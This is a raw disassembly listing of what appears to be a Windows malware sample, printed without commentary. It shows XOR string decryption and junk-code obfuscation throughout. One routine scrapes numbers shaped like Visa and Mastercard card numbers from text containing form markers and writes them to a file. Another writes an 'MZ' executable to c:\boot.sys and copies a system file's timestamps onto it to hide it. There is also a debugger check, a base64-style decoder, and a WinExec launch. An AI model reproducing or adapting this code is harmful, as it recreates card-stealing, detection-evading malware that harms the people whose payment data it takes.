push eax
push esi
push edi
lea edi, [ebp-7]
lea esi, aHS ; "H-S-"
mov ecx, 5
rep movsb
cmp dword_44237C, 0
jnz short loc_40806A
xor eax, eax
jmp short loc_4080C1
; ---------------------------------------------------------------------------
loc_40806A: ; CODE XREF: .text:00408064�j
call sub_40C4C4 ; GetCurrentThreadId
mov eax, ds:dword_42FC84
cmp [ebp+8], eax
jz short loc_40807D
xor eax, eax
jmp short loc_4080C1
; ---------------------------------------------------------------------------
loc_40807D: ; CODE XREF: .text:00408077�j
call sub_40C518 ; GetProcessHeap
lea ecx, byte_41FC80
or eax, 0FFFFFFFFh
loc_40808B: ; CODE XREF: .text:00408090�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40808B
mov edi, eax
add edi, 1
push edi
push offset byte_41FC80
push dword ptr [ebp+0Ch]
call sub_40C998
add esp, 0Ch
mov word ptr [ebp-2], 1DCDh
movzx eax, word ptr [ebp-2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-2], ax
mov eax, 1
loc_4080C1: ; CODE XREF: .text:00408068�j
; .text:0040807B�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080C5 proc near ; CODE XREF: sub_40815F+22C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 36Eh
push esi
push [ebp+arg_0]
mov eax, dword_442454
lea eax, ds:4153F0h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_40810B
; ---------------------------------------------------------------------------
loc_4080F4: ; CODE XREF: sub_4080C5+48�j
mov eax, dword_442454
add eax, edi
lea eax, ds:4153F0h[eax]
movsx edx, byte ptr [eax]
xor edx, 45h
mov [eax], dl
inc edi
loc_40810B: ; CODE XREF: sub_4080C5+2D�j
cmp edi, esi
jl short loc_4080F4
mov [ebp+var_8], 3DAh
mov eax, dword_442454
add eax, esi
mov byte ptr ds:dword_4153F0[eax], 0
mov edi, dword_442454
inc dword_442454
mov eax, dword_442454
add eax, 3
add eax, esi
mov dword_442454, eax
cmp eax, 0DE6h
jle short loc_40814E
and dword_442454, 0
loc_40814E: ; CODE XREF: sub_4080C5+80�j
mov [ebp+var_C], 0C6h
lea eax, dword_4153F0[edi]
pop edi
pop esi
leave
retn
sub_4080C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40815F proc near ; DATA XREF: sub_40A74E+76D�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_23 = byte ptr -23h
var_20 = byte ptr -20h
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
call sub_40C4E8 ; RtlGetLastWin32Error
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_10], 0
loc_408179: ; CODE XREF: sub_40815F+19B�j
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 3Ah
jnz loc_4082B2
mov [ebp+var_12], 2696h
inc [ebp+var_12]
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [eax+edx+11h], 20h
jz short loc_4081AB
cmp byte ptr [eax+edx+14h], 20h
jnz loc_4082B2
loc_4081AB: ; CODE XREF: sub_40815F+3F�j
mov [ebp+var_14], 2F8Ch
add [ebp+var_14], 89Bh
mov eax, [ebp+var_4]
inc eax
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 34h
jz short loc_4081CD
cmp al, 35h
jnz loc_4082B2
loc_4081CD: ; CODE XREF: sub_40815F+64�j
mov eax, [ebp+var_4]
add eax, 11h
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 20h
jnz short loc_4081E5
mov [ebp+var_8], 10h
jmp short loc_4081EC
; ---------------------------------------------------------------------------
loc_4081E5: ; CODE XREF: sub_40815F+7B�j
mov [ebp+var_8], 13h
loc_4081EC: ; CODE XREF: sub_40815F+84�j
mov [ebp+var_9], 0
xor ebx, ebx
jmp loc_408285
; ---------------------------------------------------------------------------
loc_4081F7: ; CODE XREF: sub_40815F+129�j
call sub_40C4E8 ; RtlGetLastWin32Error
cmp [ebp+var_8], 13h
jnz short loc_408238
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 2Dh
jnz short loc_408238
mov edi, 5
mov esi, ebx
inc esi
mov [ebp+var_28], edi
mov eax, esi
mov ecx, edi
xor edx, edx
div ecx
mov [ebp+var_2C], eax
mov eax, edi
mov edi, [ebp+var_2C]
mul [ebp+var_2C]
mov [ebp+var_30], eax
mov edi, eax
cmp edi, esi
jz short loc_408284
loc_408238: ; CODE XREF: sub_40815F+A1�j
; sub_40815F+B0�j
lea edi, [ebp+var_1B]
lea esi, a8fr8 ; "8Fr8!#"
mov ecx, 7
rep movsb
mov eax, [ebp+var_4]
inc eax
add eax, ebx
mov edx, [ebp+arg_0]
mov al, [edx+eax]
cmp al, 30h
jl short loc_40825C
cmp al, 39h
jle short loc_40825E
loc_40825C: ; CODE XREF: sub_40815F+F7�j
jmp short loc_4082B2
; ---------------------------------------------------------------------------
loc_40825E: ; CODE XREF: sub_40815F+FB�j
lea edi, [ebp+var_23]
lea esi, aMKJ ; "m:K!< j"
movsd
movsd
movzx eax, [ebp+var_9]
mov edx, [ebp+var_4]
inc edx
add edx, ebx
mov ecx, [ebp+arg_0]
mov dl, [ecx+edx]
mov ds:byte_433F40[eax], dl
add [ebp+var_9], 1
loc_408284: ; CODE XREF: sub_40815F+D7�j
inc ebx
loc_408285: ; CODE XREF: sub_40815F+93�j
cmp ebx, [ebp+var_8]
jb loc_4081F7
mov eax, [ebp+var_8]
mov ds:byte_433F40[eax], 0
call sub_401320
or eax, eax
jz short loc_4082A9
call sub_40C4C4 ; GetCurrentThreadId
jmp short loc_4082B2
; ---------------------------------------------------------------------------
loc_4082A9: ; CODE XREF: sub_40815F+141�j
mov [ebp+var_10], 1
jmp short loc_408303
; ---------------------------------------------------------------------------
loc_4082B2: ; CODE XREF: sub_40815F+24�j
; sub_40815F+46�j ...
inc [ebp+var_4]
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0
jz short loc_4082FF
call sub_40C4E8 ; RtlGetLastWin32Error
mov eax, [ebp+var_4]
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 3Ch
jnz short loc_4082F5
cmp byte ptr [eax+edx+1], 46h
jnz short loc_4082F5
cmp byte ptr [eax+edx+2], 4Fh
jnz short loc_4082F5
cmp byte ptr [eax+edx+3], 52h
jnz short loc_4082F5
cmp byte ptr [eax+edx+4], 4Dh
jnz short loc_4082F5
cmp byte ptr [eax+edx+5], 5Fh
jz short loc_4082FF
loc_4082F5: ; CODE XREF: sub_40815F+171�j
; sub_40815F+178�j ...
call sub_40C518 ; GetProcessHeap
jmp loc_408179
; ---------------------------------------------------------------------------
loc_4082FF: ; CODE XREF: sub_40815F+160�j
; sub_40815F+194�j
and [ebp+var_10], 0
loc_408303: ; CODE XREF: sub_40815F+151�j
cmp [ebp+var_10], 0
jz short loc_408318
mov eax, ds:dword_42FC84
mov dword_43C218, eax
jmp loc_4083CB
; ---------------------------------------------------------------------------
loc_408318: ; CODE XREF: sub_40815F+1A8�j
mov [ebp+var_1A], 99h
sub [ebp+var_1A], 61h
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40DFE0
call sub_40C650 ; CreateFileA
mov [ebp+var_18], eax
push 2
push 0
push 0
push eax
call sub_40C65C ; SetFilePointer
mov [ebp+var_1B], 8Eh
add [ebp+var_1B], 1
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_408358: ; CODE XREF: sub_40815F+1FE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_408358
mov edi, eax
push 0
lea esi, [ebp+var_20]
push esi
push edi
push [ebp+arg_0]
push [ebp+var_18]
call sub_40C6C8 ; WriteFile
mov [ebp+var_19], 0E7h
movzx eax, [ebp+var_19]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_19], al
push 2
push offset word_446E7E
call sub_4080C5
add esp, 8
push 0
lea edi, [ebp+var_20]
push edi
mov edi, 0Ch
sub edi, dword_442450
push edi
push eax
push [ebp+var_18]
call sub_40C6C8 ; WriteFile
call sub_40C4C4 ; GetCurrentThreadId
push [ebp+var_18]
call sub_40C530 ; CloseHandle
lea edi, [ebp+var_28]
lea esi, aGV3s ; "g+V3S "
mov ecx, 8
rep movsb
loc_4083CB: ; CODE XREF: sub_40815F+1B4�j
pop edi
pop esi
pop ebx
leave
retn
sub_40815F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4083D0 proc near ; CODE XREF: sub_408472+6F�p
; sub_408581+DB�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_446478
lea eax, ds:40D000h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov [ebp+var_4], 3DEh
xor edi, edi
jmp short loc_408419
; ---------------------------------------------------------------------------
loc_4083FF: ; CODE XREF: sub_4083D0+4B�j
mov eax, dword_446478
add eax, edi
lea eax, ds:40D000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0A2h
mov [eax], dl
inc edi
loc_408419: ; CODE XREF: sub_4083D0+2D�j
cmp edi, esi
jl short loc_4083FF
mov [ebp+var_8], 39Dh
mov eax, dword_446478
add eax, esi
mov byte ptr ds:dword_40D000[eax], 0
xor edi, edi
mov edi, dword_446478
mov eax, edi
add eax, 6
add eax, esi
mov dword_446478, eax
add dword_446478, 3
cmp dword_446478, 0E05h
jle short loc_408461
and dword_446478, 0
loc_408461: ; CODE XREF: sub_4083D0+88�j
mov [ebp+var_C], 1E6h
lea eax, dword_40D000[edi]
pop edi
pop esi
leave
retn
sub_4083D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408472 proc near ; CODE XREF: sub_408581+A2�p
var_230 = byte ptr -230h
var_229 = byte ptr -229h
var_228 = byte ptr -228h
var_220 = byte ptr -220h
var_218 = byte ptr -218h
var_210 = word ptr -210h
var_20E = byte ptr -20Eh
var_20B = byte ptr -20Bh
var_106 = byte ptr -106h
var_105 = byte ptr -105h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
call sub_40C4B8 ; GetCurrentProcessId
lea edi, [ebp+var_20E]
lea esi, byte_44647C
mov ecx, 3
rep movsb
mov ax, word_44647F
mov [ebp+var_210], ax
push 104h
lea eax, [ebp+var_20B]
push eax
call sub_40C524 ; GetSystemDirectoryA
mov [ebp+var_106], 78h
sub [ebp+var_106], 4Dh
lea eax, [ebp+var_20B]
push eax
lea eax, [ebp+var_105]
push eax
call sub_40C45C
call sub_40C4C4 ; GetCurrentThreadId
push 0Dh
push offset dword_446E70
call sub_4083D0
push eax
lea edi, [ebp+var_105]
push edi
call sub_40C9F8
add esp, 10h
call sub_40C4B8 ; GetCurrentProcessId
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_105]
push eax
call sub_40C650 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40857C
lea edi, [ebp+var_230]
lea esi, aAluvia_0 ; "LUVIa"
mov ecx, 7
rep movsb
lea eax, [ebp+var_228]
push eax
lea eax, [ebp+var_220]
push eax
lea eax, [ebp+var_218]
push eax
push ebx
call sub_40C4DC ; GetFileTime
lea eax, [ebp+var_228]
push eax
lea eax, [ebp+var_220]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+arg_0]
call sub_40C668 ; SetFileTime
mov [ebp+var_229], 80h
sub [ebp+var_229], 49h
push ebx
call sub_40C530 ; CloseHandle
loc_40857C: ; CODE XREF: sub_408472+A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_408472 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408581 proc near ; CODE XREF: sub_40A74E+91�p
var_229 = byte ptr -229h
var_228 = byte ptr -228h
var_222 = byte ptr -222h
var_21B = byte ptr -21Bh
var_216 = byte ptr -216h
var_215 = byte ptr -215h
var_111 = byte ptr -111h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 22Ch
push ebx
push esi
push edi
lea edi, [ebp+var_216]
lea esi, byte_446488
xor ecx, ecx
inc ecx
rep movsb
call sub_40C554 ; GetVersion
cmp eax, 80000000h
jnb loc_4086C4
call sub_40C4E8 ; RtlGetLastWin32Error
lea edi, [ebp+var_111]
lea esi, aCBoot_sys ; "c:\\boot.sys"
mov ecx, 3
rep movsd
lea edi, [ebp+var_21B]
lea esi, aZh ; ":zH="
mov ecx, 5
rep movsb
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_111]
push eax
call sub_40C650 ; CreateFileA
mov ebx, eax
lea edi, [ebp+var_222]
lea esi, a0vmI ; "0Vm |I"
mov ecx, 7
rep movsb
push 0
lea eax, [ebp+var_228]
push eax
push 4001h
push offset aMzr ; "MZ"
push ebx
call sub_40C6C8 ; WriteFile
push ebx
call sub_408472
push ebx
call sub_40C530 ; CloseHandle
call sub_40C4B8 ; GetCurrentProcessId
lea edi, [ebp+var_229]
lea esi, byte_4464A1
xor ecx, ecx
inc ecx
rep movsb
push 104h
lea eax, [ebp+var_104]
push eax
call sub_40C524 ; GetSystemDirectoryA
push 0Ah
push offset byte_446E65
call sub_4083D0
lea edi, [ebp+var_104]
push edi
push eax
lea edi, [ebp+var_215]
push edi
call sub_40C9D4
push 1Dh
push offset byte_446E47
call sub_4083D0
push eax
lea edi, [ebp+var_104]
push edi
call sub_40C9F8
add esp, 28h
mov [ebp+var_105], 98h
sub [ebp+var_105], 0F3h
lea eax, [ebp+var_215]
push eax
call sub_40C488 ; DeleteFileA
mov ebx, 187Dh
add ebx, 540Dh
push 0
lea eax, [ebp+var_104]
push eax
call sub_40C6BC ; WinExec
loc_4086C4: ; CODE XREF: sub_408581+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_408581 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_44652C
lea eax, ds:432DD0h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_408707
; ---------------------------------------------------------------------------
loc_4086F0: ; CODE XREF: .text:00408709�j
mov eax, dword_44652C
add eax, edi
lea eax, ds:432DD0h[eax]
movsx edx, byte ptr [eax]
xor edx, 79h
mov [eax], dl
inc edi
loc_408707: ; CODE XREF: .text:004086EE�j
cmp edi, esi
jl short loc_4086F0
mov dword ptr [ebp-4], 3DDh
mov eax, dword_44652C
add eax, esi
mov byte ptr ds:dword_432DD0[eax], 0
xor edi, edi
mov edi, dword_44652C
add dword_44652C, 3
mov eax, dword_44652C
add eax, 4
add eax, esi
mov dword_44652C, eax
add dword_44652C, 2
cmp dword_44652C, 0E06h
jle short loc_408759
and dword_44652C, 0
loc_408759: ; CODE XREF: .text:00408750�j
mov dword ptr [ebp-8], 29h
lea eax, dword_432DD0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40876A proc near ; CODE XREF: sub_408884+46�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_1], 44h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push 4
push 1000h
push [ebp+arg_0]
push 0
call sub_40C68C ; VirtualAlloc
leave
retn
sub_40876A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408792 proc near ; CODE XREF: sub_408884+F9�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_2], 77h
add [ebp+var_2], 3337h
push 8000h
push 0
push [ebp+arg_0]
call sub_40C698 ; VirtualFree
jmp short locret_4087B8
; ---------------------------------------------------------------------------
call sub_40C4E8 ; RtlGetLastWin32Error
locret_4087B8: ; CODE XREF: sub_408792+1F�j
leave
retn
sub_408792 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 26h
push esi
push dword ptr [ebp+8]
mov eax, dword_446538
lea eax, ds:43A3B0h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov dword ptr [ebp-8], 207h
xor edi, edi
jmp short loc_408807
; ---------------------------------------------------------------------------
loc_4087F0: ; CODE XREF: .text:00408809�j
mov eax, dword_446538
add eax, edi
lea eax, ds:43A3B0h[eax]
movsx edx, byte ptr [eax]
xor edx, 62h
mov [eax], dl
inc edi
loc_408807: ; CODE XREF: .text:004087EE�j
cmp edi, esi
jl short loc_4087F0
mov dword ptr [ebp-0Ch], 294h
mov eax, dword_446538
add eax, esi
mov byte ptr ds:dword_43A3B0[eax], 0
xor edi, edi
mov edi, dword_446538
mov eax, edi
add eax, 6
add eax, esi
mov dword_446538, eax
add dword_446538, 2
cmp dword_446538, 0DFCh
jle short loc_40884F
and dword_446538, 0
loc_40884F: ; CODE XREF: .text:00408846�j
mov dword ptr [ebp-10h], 158h
lea eax, dword_43A3B0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408860 proc near ; CODE XREF: sub_408884+10D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
call sub_40C4B8 ; GetCurrentProcessId
push offset dword_4464E4
push offset dword_4464A4
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40BA04
call sub_40C4E8 ; RtlGetLastWin32Error
pop ebp
retn
sub_408860 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408884 proc near ; CODE XREF: sub_409883+414�p
var_79 = byte ptr -79h
var_78 = word ptr -78h
var_76 = byte ptr -76h
var_6F = byte ptr -6Fh
var_69 = byte ptr -69h
var_62 = byte ptr -62h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 7Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C548 ; GetTickCount
lea edi, [ebp+var_69]
lea esi, aFf3?B ; "Ff3? b"
mov ecx, 7
rep movsb
lea edi, [ebp+var_6F]
lea esi, a_lpbl ; ".LpBL"
mov ecx, 3
rep movsw
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4088C1
add eax, 3Fh
loc_4088C1: ; CODE XREF: sub_408884+38�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
call sub_40876A
pop ecx
mov [ebp+var_18], eax
mov [ebp+var_1C], 40FBh
add [ebp+var_1C], 7E12h
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_4088EC
add eax, 3Fh
loc_4088EC: ; CODE XREF: sub_408884+63�j
sar eax, 6
mov edi, eax
shl edi, 6
push edi
push [ebp+var_18]
call sub_40C644 ; RtlZeroMemory
call sub_40C4E8 ; RtlGetLastWin32Error
push [ebp+arg_4]
push ebx
push [ebp+var_18]
call sub_40C998
add esp, 0Ch
mov [ebp+var_20], 7904h
inc [ebp+var_20]
lea eax, [ebp+var_14]
push eax
call sub_40BB42
lea edi, [ebp+var_76]
lea esi, aHCwul ; "H,CwUL"
mov ecx, 7
rep movsb
mov ebx, [ebp+var_18]
and [ebp+var_4], 0
jmp short loc_408967
; ---------------------------------------------------------------------------
loc_40893D: ; CODE XREF: sub_408884+F4�j
lea edi, [ebp+var_79]
lea esi, dword_446550
xor ecx, ecx
inc ecx
rep movsb
push ebx
lea eax, [ebp+var_14]
push eax
call sub_40BB69
mov [ebp+var_78], 4738h
sub [ebp+var_78], 2F2Eh
add ebx, 40h
inc [ebp+var_4]
loc_408967: ; CODE XREF: sub_408884+B7�j
mov eax, [ebp+arg_4]
add eax, 40h
jge short loc_408972
add eax, 3Fh
loc_408972: ; CODE XREF: sub_408884+E9�j
sar eax, 6
cmp [ebp+var_4], eax
jl short loc_40893D
push [ebp+var_18]
call sub_408792
mov [ebp+var_21], 6Dh
add [ebp+var_21], 1
lea eax, [ebp+var_62]
push eax
push [ebp+arg_8]
call sub_408860
call sub_40C548 ; GetTickCount
mov eax, dword_446534
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_62]
push eax
call sub_40C98C
add esp, 18h
or eax, eax
jz short loc_4089BD
xor eax, eax
inc eax
jmp short loc_4089C7
; ---------------------------------------------------------------------------
loc_4089BD: ; CODE XREF: sub_408884+132�j
mov [ebp+var_22], 0C3h
sub [ebp+var_22], 0ACh
xor eax, eax
loc_4089C7: ; CODE XREF: sub_408884+137�j
pop edi
pop esi
pop ebx
leave
retn
sub_408884 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_44655C
lea eax, ds:439360h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov dword ptr [ebp-4], 210h
xor edi, edi
jmp short loc_408A13
; ---------------------------------------------------------------------------
loc_4089F9: ; CODE XREF: .text:00408A15�j
mov eax, dword_44655C
add eax, edi
lea eax, ds:439360h[eax]
movsx edx, byte ptr [eax]
xor edx, 85h
mov [eax], dl
inc edi
loc_408A13: ; CODE XREF: .text:004089F7�j
cmp edi, esi
jl short loc_4089F9
mov eax, dword_44655C
add eax, esi
mov byte ptr ds:dword_439360[eax], 0
mov edi, dword_44655C
mov eax, edi
lea eax, [eax+esi+4]
mov dword_44655C, eax
cmp eax, 0DFEh
jle short loc_408A45
and dword_44655C, 0
loc_408A45: ; CODE XREF: .text:00408A3C�j
lea eax, dword_439360[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A4F proc near ; CODE XREF: sub_409883+377�p
; sub_409883+38F�p
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov [ebp+var_16], 243Ch
movzx eax, [ebp+var_16]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_16], ax
xor eax, eax
mov [ebp+var_10], eax
mov [ebp+var_14], eax
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
add eax, [ebp+var_8]
mov [ebp+var_C], eax
mov ebx, [ebp+arg_0]
jmp loc_408B70
; ---------------------------------------------------------------------------
loc_408A8E: ; CODE XREF: sub_408A4F+12C�j
lea edi, [ebp+var_1E]
lea esi, a4Zqk? ; "4<Zqk?"
mov ecx, 7
rep movsb
movsx edi, byte ptr [ebx]
shl edi, 2
mov edi, dword_446560[edi]
mov [ebp+var_4], edi
call sub_40C518 ; GetProcessHeap
cmp edi, 0FFFFFFFFh
jz loc_408B6F
call sub_40C548 ; GetTickCount
mov eax, [ebp+var_10]
or eax, eax
jl loc_408B69
cmp eax, 3
jg loc_408B69
jmp off_44696C[eax*4]
; ---------------------------------------------------------------------------
call sub_40C5D8 ; IsDebuggerPresent
loc_408AE1: ; CODE XREF: sub_408A4F+86�j
; DATA XREF: .data:off_44696C�o
inc [ebp+var_10]
call sub_40C518 ; GetProcessHeap
jmp short loc_408B69
; ---------------------------------------------------------------------------
loc_408AEB: ; CODE XREF: sub_408A4F+86�j
; DATA XREF: .data:00446970�o
mov edi, [ebp+var_14]
shl edi, 2
mov esi, [ebp+var_4]
and esi, 30h
sar esi, 4
or edi, esi
mov edx, edi
mov [ebp+var_17], dl
call sub_40C4E8 ; RtlGetLastWin32Error
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408B69
; ---------------------------------------------------------------------------
loc_408B16: ; CODE XREF: sub_408A4F+86�j
; DATA XREF: .data:00446974�o
mov edi, [ebp+var_14]
and edi, 0Fh
shl edi, 4
mov esi, [ebp+var_4]
and esi, 3Ch
sar esi, 2
or edi, esi
mov edx, edi
mov [ebp+var_17], dl
call sub_40C4B8 ; GetCurrentProcessId
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
inc [ebp+var_10]
jmp short loc_408B69
; ---------------------------------------------------------------------------
loc_408B44: ; CODE XREF: sub_408A4F+86�j
; DATA XREF: .data:00446978�o
mov edi, [ebp+var_14]
and edi, 3
shl edi, 6
or edi, [ebp+var_4]
mov edx, edi
mov [ebp+var_17], dl
call sub_40C548 ; GetTickCount
mov eax, [ebp+var_8]
inc [ebp+var_8]
mov dl, [ebp+var_17]
mov [eax], dl
and [ebp+var_10], 0
loc_408B69: ; CODE XREF: sub_408A4F+77�j
; sub_408A4F+80�j ...
mov eax, [ebp+var_4]
mov [ebp+var_14], eax
loc_408B6F: ; CODE XREF: sub_408A4F+67�j
inc ebx
loc_408B70: ; CODE XREF: sub_408A4F+3A�j
cmp byte ptr [ebx], 0
jz short loc_408B81
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_408A8E
loc_408B81: ; CODE XREF: sub_408A4F+124�j
cmp byte ptr [ebx], 0
jnz short loc_408BA6
mov [ebp+var_1C], 68F4h
sub [ebp+var_1C], 6A0Fh
mov eax, [ebp+var_8]
sub eax, [ebp+arg_4]
jmp short loc_408BA9
; ---------------------------------------------------------------------------
mov ax, word_446967
mov [ebp+var_1E], ax
loc_408BA6: ; CODE XREF: sub_408A4F+135�j
or eax, 0FFFFFFFFh
loc_408BA9: ; CODE XREF: sub_408A4F+14B�j
pop edi
pop esi
pop ebx
leave
retn
sub_408A4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408BAE proc near ; CODE XREF: sub_408C55+47�p
; sub_408C55+59�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 0A0h
push esi
push [ebp+arg_0]
mov eax, dword_446984
lea eax, ds:413E20h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov [ebp+var_8], 92h
xor edi, edi
jmp short loc_408BFB
; ---------------------------------------------------------------------------
loc_408BE4: ; CODE XREF: sub_408BAE+4F�j
mov eax, dword_446984
add eax, edi
lea eax, ds:413E20h[eax]
movsx edx, byte ptr [eax]
xor edx, 24h
mov [eax], dl
inc edi
loc_408BFB: ; CODE XREF: sub_408BAE+34�j
cmp edi, esi
jl short loc_408BE4
mov eax, dword_446984
add eax, esi
mov byte ptr ds:dword_413E20[eax], 0
xor edi, edi
mov edi, dword_446984
inc dword_446984
mov eax, dword_446984
lea eax, [eax+esi+6]
mov dword_446984, eax
add dword_446984, 2
cmp dword_446984, 0DB8h
jle short loc_408C44
and dword_446984, 0
loc_408C44: ; CODE XREF: sub_408BAE+8D�j
mov [ebp+var_C], 2B6h
lea eax, dword_413E20[edi]
pop edi
pop esi
leave
retn
sub_408BAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C55 proc near ; CODE XREF: sub_409883+608�p
; sub_409883:loc_40A074�p ...
var_285 = byte ptr -285h
var_282 = word ptr -282h
var_280 = dword ptr -280h
var_279 = byte ptr -279h
var_274 = byte ptr -274h
var_26D = byte ptr -26Dh
var_26C = byte ptr -26Ch
var_265 = byte ptr -265h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_14C = word ptr -14Ch
var_14A = byte ptr -14Ah
var_46 = word ptr -46h
var_44 = dword ptr -44h
var_18 = dword ptr -18h
var_14 = word ptr -14h
push ebp
mov ebp, esp
sub esp, 288h
push ebx
push esi
push edi
mov [ebp+var_46], 635Bh
movzx eax, [ebp+var_46]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_46], ax
lea edi, [ebp+var_265]
lea esi, byte_446988
xor ecx, ecx
inc ecx
rep movsb
call sub_40C554 ; GetVersion
mov [ebp+var_264], 104h
push 21h
push offset byte_446E25
call sub_408BAE
mov [ebp+var_280], eax
push 4
push offset aTepl ; "tEPL"
call sub_408BAE
lea edi, [ebp+var_26C]
push edi
lea edi, [ebp+var_264]
push edi
lea edi, [ebp+var_260]
push edi
push eax
